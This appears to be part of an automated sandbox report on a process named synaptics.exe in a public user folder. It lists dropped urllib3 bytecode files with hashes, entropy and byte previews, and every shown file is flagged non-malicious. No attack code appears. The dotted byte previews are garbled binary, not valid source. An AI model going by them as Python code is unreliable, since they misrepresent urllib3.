                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....CC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_get....s4....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):945
                                                                                                                                                                                                                                  Entropy (8bit):5.335058512081807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:cIJUVegJzYoyYhRYQZyihmLptrv2buqq9PXgnL:H3gJz2Y39Zyi0TrOaqq9PQL
                                                                                                                                                                                                                                  MD5:C41FEF6B783E8EECE0198617E74A6AE2
                                                                                                                                                                                                                                  SHA1:B0C2E5AFCFBDEDA113207DA25A822EB8625E45B8
                                                                                                                                                                                                                                  SHA-256:F473382CDAB3E9C68DC52B03BB7B4287810698EA06E09F17AF4191081FFA9C6D
                                                                                                                                                                                                                                  SHA-512:521630D3A8FA007DD031F8AF127C691368B552F1794BD67783A74545473D11E08E0A7822B8E1A1AB23BBA2D22C962F4D4BCB36A52284465A08EF5AFE528397D4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser....Z.retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r....r.....EC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3464
                                                                                                                                                                                                                                  Entropy (8bit):5.549251575478348
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:5d8QkXnGjn+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:nkXw+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                                                                  MD5:541ED9AD54B516938ABDB098CF3942D6
                                                                                                                                                                                                                                  SHA1:C8E8E562D47D866285EEAC8C7180910E1A302346
                                                                                                                                                                                                                                  SHA-256:9D8F15F41A969E48C42D20BC0EBFCF17E3398FE5FE9F67CADE67966A41526CD9
                                                                                                                                                                                                                                  SHA-512:49AAD2535B86A5B33E6D1F81FFDB7D4BA41E63BC3BD98A4D36D8E50836574E4D7EB21FE0B674A5E9E6BEBE4108737374761AEFE67C2F7F8594F2D9A2CE288612
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....GC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|.|.|...}.t.|.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1075
                                                                                                                                                                                                                                  Entropy (8bit):5.401485315448029
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:V/ZpGf5n/lIpWt84RzmQXvAFnT8adLRmn7frY8lt6rn:Vut/Rt82m38apQ7f7S
                                                                                                                                                                                                                                  MD5:466696703BF81DFB7F87BCAE933269AC
                                                                                                                                                                                                                                  SHA1:1C4354D9ECE911A0900E07D423E5946D4D64E5FD
                                                                                                                                                                                                                                  SHA-256:3274CFBDB7D4E254DEA62734181131CE451AAA829CCCEE8BDEBC0F395517EFD0
                                                                                                                                                                                                                                  SHA-512:34FD6475DC88DD8A3560B0DCB8F7774C594477338A2D6AF9E9DC491C983FA5DB702F1AE146095870FB4031D587A6FB88B563D6CC25B00543BD2793A2078CC6CE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....BC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE_CHECKING..co
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6199
                                                                                                                                                                                                                                  Entropy (8bit):5.6533985898304975
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Rj+t5YiDKV+DKYzQ2P7f5xv5j4GyT/+MyjjMbsrHMCtkXT3v5tChK:EFKV+DKYzP7xx6tsjM4HITDN
                                                                                                                                                                                                                                  MD5:D64DF140B76FEB45EA05850308813234
                                                                                                                                                                                                                                  SHA1:961E7BD9F772B3D0FB41D02A0F3F664206CE762A
                                                                                                                                                                                                                                  SHA-256:EBBBA1EE8E3B55A9134BD61A91C43E6095D957E24E3F4EB8E33343A1CE009A25
                                                                                                                                                                                                                                  SHA-512:896BA4D92D4F10D63D10A6FC5700C27779B3F4DDA265132834A43993A742F79B59D32DA5354BFFECE20707E163F6B5BDA4D441C61D47D15F8AA8DE26BC6F50F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....DC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.OPTIONSZ.CONNECTZ.GETZ.TRACEZ.DELETE..HEAD..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | None..basic_au
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2331
                                                                                                                                                                                                                                  Entropy (8bit):5.378966987598538
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Cmhh168LJQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:p6OGslvhaIds
                                                                                                                                                                                                                                  MD5:8D35BE9FD7E9680082D0519CB449CF4B
                                                                                                                                                                                                                                  SHA1:A8E383D51F338384B3D0AE95A484D9B0E75A7C2A
                                                                                                                                                                                                                                  SHA-256:F0B6C61C38A706F82C21E180DA1E2EA9D53CEB8433B203F1569225598AF645FD
                                                                                                                                                                                                                                  SHA-512:3E80DF311D4FAFA785E14E52FF2374BD41CBE35A63B63AEA1F563BFB20E439C25F0BB370F4EFA356A6FD43F5D153C545F685C6B9383E1F39F9F2E1F7770CAC41
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....EC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been successfully
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15744
                                                                                                                                                                                                                                  Entropy (8bit):5.362024199840115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0f/hj12FuuccXjtRLJIkyuhvCTe247+TiEj0bPkCeb31I2s5P7SXR:0usuPVJvCTe7AiGiPkCeRmPmXR
                                                                                                                                                                                                                                  MD5:753B883C035B4F3DDB8E03D8B377B81B
                                                                                                                                                                                                                                  SHA1:E222627F18FBF49248E6F174D3C52DBB4745F187
                                                                                                                                                                                                                                  SHA-256:79FFFA619BA37A90905DE08376F946EED9D4A93E0A3FC19F7B61E074E771922D
                                                                                                                                                                                                                                  SHA-512:1A2FF7761511AB406DC406A47CE37ADD2506ACC0F671ACED49961A5125F077E82FA79C0A94FD28A3CAF6BEAAABEFEDE25B701D873A805DA6179EA65EF7989931
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....BC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.e.d.f.dbd'd(.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12456
                                                                                                                                                                                                                                  Entropy (8bit):5.654547680750556
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:pjILm6642sli6M00PVnGAKK1JK9CpdJyKm2ggAgbO7:Bq/luBtn/DyKMgAgbO7
                                                                                                                                                                                                                                  MD5:8C0EE9EDCEE1A4E56D797C099C232121
                                                                                                                                                                                                                                  SHA1:09D0AC43AE689A6A52F899F40DFC946433C84056
                                                                                                                                                                                                                                  SHA-256:82178FAF4CAAEB9834113A19554D0771639C678C93610A06B96A11B14041FF8E
                                                                                                                                                                                                                                  SHA-512:A60B9DBBD783A9EFF062E31F435297E0EE429E08A8D512A2CACBB7ED77714082007B37998FB6202AFBF8233765EE80362EC59E360A9ECDF0EDAC6BEC41DF8D34
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3700
                                                                                                                                                                                                                                  Entropy (8bit):5.716360768217598
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:hY/R/mbkAMdqu1vkAlH2TIYxfyRGH0MYUFgAL8IzE+wqq3:hXYA2MAV07xjHTgh2Etqq3
                                                                                                                                                                                                                                  MD5:03E936F7627C4507748FAC76D4B02D2B
                                                                                                                                                                                                                                  SHA1:9F51F300DF7C8E2188EDD6916D63F794C9285CAF
                                                                                                                                                                                                                                  SHA-256:BA6F66BAF6594F8D09A428D0DEF2C39F1F41590412E2ABE741D18FE82D206818
                                                                                                                                                                                                                                  SHA-512:206CF97E406B42F49FB957EB64F71FB45D68E89C7D4D2AC6E5347EC78B0C9D4A55AF1ED0C2717344C782FDBB613BAEFD755FFF5BE870B95015C462AACE4AAA09
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j.r%d.d.l.m.Z...d.Z.G.d.d...d.e...Z...d!d"d.d...Z.d#d.d...Z...d$d%d.d ..Z.d.S.)&zHThe match_hostname() function from Python 3.5, essential when using SSL......)...annotationsN)...IPv4Address..IPv6Address.....)..._TYPE_PEER_CERT_RET_DICTz.3.5.0.1c....................@...s....e.Z.d.Z.d.S.)...CertificateErrorN)...__name__..__module__..__qualname__..r....r.....OC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\ssl_match_hostname.pyr........s........r......dn..typing.Any..hostname..str..max_wildcards..int..return..typing.Match[str] | None | boolc....................C...s....g.}.|.s.d.S.|...d...}.|.d...}.|.d.d.....}.|...d...}.|.|.k.r&t.d.t.|.........|.s2t.|.....|.....k...S.|.d.k.r<|...d.....n.|...d...sF|...d...rO|...t...|.......n.|...t...|.....d.d.......|.D.].}.|...t...|.......q]t...d.d...|.....d...t.j...}.|...|...S.).zhMatching according to RFC 6125, section 6.4.3.. http://tool
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9416
                                                                                                                                                                                                                                  Entropy (8bit):5.267703169144071
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:P330cuKX0jSvpkv9nfgC+JydABK1sdIDv5YaBbcMhu:P330lKsSvp4BdcYsyxBYWu
                                                                                                                                                                                                                                  MD5:EA1D21B1B8B2FC31489E68DBD7CC96F3
                                                                                                                                                                                                                                  SHA1:B19ECCBA22C4CC45CCA7D5BEE9B564C9AC6A5053
                                                                                                                                                                                                                                  SHA-256:C7E93284A92DA166E3274321B052180CE268DDC7DD9E369DC79FC58106FCAF79
                                                                                                                                                                                                                                  SHA-512:EAF35A0A7BA10896DCBFB3086D17B436E955D5B170268000FDDEA6E5EE286C467E7C5698A1073498EEF720483F33555B6E05CE1053848D145A0663F2ABFD2769
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.".......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.r-d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.e.f...Z.e...d...Z.d.Z.G.d.d...d...Z.d.S.)......)...annotationsN.....)...ProxySchemeUnsupported)...Self.....)..._TYPE_PEER_CERT_RET.._TYPE_PEER_CERT_RET_DICT.._ReturnValuei.@..c....................@...s....e.Z.d.Z.d.Z.e.dsd.d.....Z.....dtdud.d...Z.dvd.d...Z.dwd.d...Z.dxd.d...Z.dydzd!d"..Z.d{d|d&d'..Z....#d}d~d,d-..Z.d.d.d0d1..Z.d.d.d2d3..Z...d.d.d.d.d4..d.d<d=..Z.d.d>d?..Z.d.d@dA..Z.e.j..Bd.d.dFdG....Z.e.j.d.dJdG....Z.d.d.dMdG..Z.d.dNdO..Z.d.dQdR..Z.d.dSdT..Z.d.dVdW..Z.d.dXdY..Z.d.d\d]..Z.d.d^d_..Z.d.d`da..Z.d.d.dcdd..Z.e.j.d.dgdh....Z.e.j.d.dkdh....Z.e.j.d.dndh....Z.....d.d.drdh..Z.d.S.)...SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. i
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9596
                                                                                                                                                                                                                                  Entropy (8bit):5.133485972318439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:H08AOMrflhdz+7V0MV8K7byybXiCDzQyFF/LCfAChn8l/qxzWOBGawWy8I81GZ5e:HdQn+l/ucy80CBXPqGrpjMKfQHcsyJO
                                                                                                                                                                                                                                  MD5:99D378291588348628D8BDF1CD754963
                                                                                                                                                                                                                                  SHA1:9984C157BB1AB27D5BBE7C6AE70C2C6AFF288D24
                                                                                                                                                                                                                                  SHA-256:4051B4D88C97695E0779190C8A708D591D94366E0023B6F9B0C4F4CA2050C3F1
                                                                                                                                                                                                                                  SHA-512:E058F7EFC08BF624E2ADFD699FFD6945DB80FD18DBE37534FE655B1444C7610B5EBD21FC0BADA32371A66A37C107FE355E7A53D5BEBBA08BF75368A0FAA7FD78
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fj(.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r*d.d.l.m.Z...G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.j.e.e.f.....Z.G.d.d...d...Z.d.S.)......)...annotationsN)...Enum)...getdefaulttimeout.....)...TimeoutStateError)...Finalc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_DEFAULT.....N)...__name__..__module__..__qualname__..token..r....r.....DC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\timeout.pyr........s........r....z.Final[_TYPE_DEFAULT].._DEFAULT_TIMEOUTc....................@...s....e.Z.d.Z.U.d.Z.e.Z.d.e.d.<.d.e.e.f.d$d.d...Z.d%d.d...Z.e.Z.e.d&d.d.....Z.e.d'd.d.....Z.e.d(d.d.....Z.d)d.d...Z.d*d.d...Z.d*d.d...Z.e.d+d d!....Z.e.d,d"d#....Z.d.S.)-..Timeouta....Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout=timeout)..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11234
                                                                                                                                                                                                                                  Entropy (8bit):5.7845607279902715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JVOJEgt54KqlH/qu/QFYP0YU5HqDEuwqSvqi1D5hlSdm0ICwqW4q5cPoBTJqovLV:JVeEgt54KqVquoJxHqDEuwqSvqi1D5XJ
                                                                                                                                                                                                                                  MD5:E7C7C6E4E31E0796D9A30A78EFEB02FB
                                                                                                                                                                                                                                  SHA1:B5D789BE18F3B8F7D3983DBAC83FD05FDACD06AF
                                                                                                                                                                                                                                  SHA-256:C15632154BDED674B596C40F5A96F40BA2761B62D0BF039025DE0CCE3A03F8F0
                                                                                                                                                                                                                                  SHA-512:23CB026EADFBAD97024C0F72BE6F66279CD2571FAB8CA2F0D855CC541B8DCC7F4E25D64FAB05378E44EE4DE28EAB7623BC43A9A31FF8DDC3AE47D1DEA3F96887
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fm;.......................@...s~...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.e...d...Z.e...d...Z.e...d.e.j.e.j.B...Z.d.Z.d.Z.d.j.e.e.d...Z.e.e.d...Z.g.d...Z.d.Z.d.d...d.d...e.D.......d...Z.d.e...d...Z.d.e...d...e...d...Z.d.Z.e...d...Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e.d.d.......d.....Z.e...d e...d!....Z d"e.e.e.f...Z!e...e!e.j.e.j.B...Z"e#d#..Z$e#d$..Z%e$e%B.d%h.B.Z&e&d&d'h.B.Z'e'd(h.B...Z(Z)G.d)d*..d*e..*d*d+e.j+e,..f.d,e.j+e,..f.d-e.j+e,..f.d.e.j+e-..f.d/e.j+e,..f.d0e.j+e,..f.d1e.j+e,..f.g.....Z.e.j/dMd7d8....Z0e.j/dNd:d8....Z0dOd<d8..Z0dPd=d>..Z1e.j/dQd?d@....Z2e.j/dRdAd@....Z2dSdBd@..Z2dTdEdF..Z3dUdHdI..Z4dVdKdL..Z5d.S.)W.....)...annotationsN.....)...LocationParseError.....)...to_str)...http..httpsNz.%[a-fA-F0-9]{2}z.^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)zS^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?(?://([^\\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$z.(?:[0-9]{1,3}\.){3}[0-9]{1,3}z.[0-9A-Fa-f]{1,4}z.(?:{hex}:{hex}|{ipv4}))...hexZ.ipv4).r....Z.ls32).
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                  Entropy (8bit):5.056681096561531
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Su2LkVMQdXRjkhlcRE+nyz4tMXSwgpsqnud9Qzm+6IErGXTSu:S0MQdBYhlc++gWp1KQ9+GXmu
                                                                                                                                                                                                                                  MD5:2F003DDE94C5E8FF3891149067EB3E7F
                                                                                                                                                                                                                                  SHA1:BA9CA5EB212F0E1D0599651BA3B96EE8FBC13187
                                                                                                                                                                                                                                  SHA-256:E5865D24BEA7D775DF3A8B8E3F7C41BA134AFAC76D9FCAF3ADC74BBD239BB4B4
                                                                                                                                                                                                                                  SHA-512:49BF93BD0A7C1CA8C8002F12451400BCDE2713241F092555DBF1FBF413805CC259FAA346CDD059DC41543A39A65B3D1202473B2F434F3593F6AE99C31168F583
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fz........................@...sN...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...Z...d.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...TracebackType..x..str | bytes..encoding..str | None..errors..return..bytesc....................C....R...t.|.t...r.|.S.t.|.t...s.t.d.t.|...j.........|.s.|.r%|.j.|.p.d.|.p"d.d...S.|.....S...Nz.not expecting type z.utf-8..strict).r....)...isinstancer......str..TypeError..type..__name__..encode..r....r....r......r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\util.py..to_bytes.......................r....r....c....................C...r....r....).r....r....r....r....r....r......decoder....r....r....r......to_str....r....r......tp..type[BaseException] | None..value..BaseException..tb..TracebackType | None..typing.NoReturnc....................C...s$...z.|.j.|.u.r.|...|.....|...d.}.d.}.w...N)...__traceback__..with_traceback).r....r....r....r....r....r......reraise....s................r%...).NN).r....r....r....r....r....r....r....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2384
                                                                                                                                                                                                                                  Entropy (8bit):5.156740768418198
                                                                                                                                                                                                                                  Encrypted:false
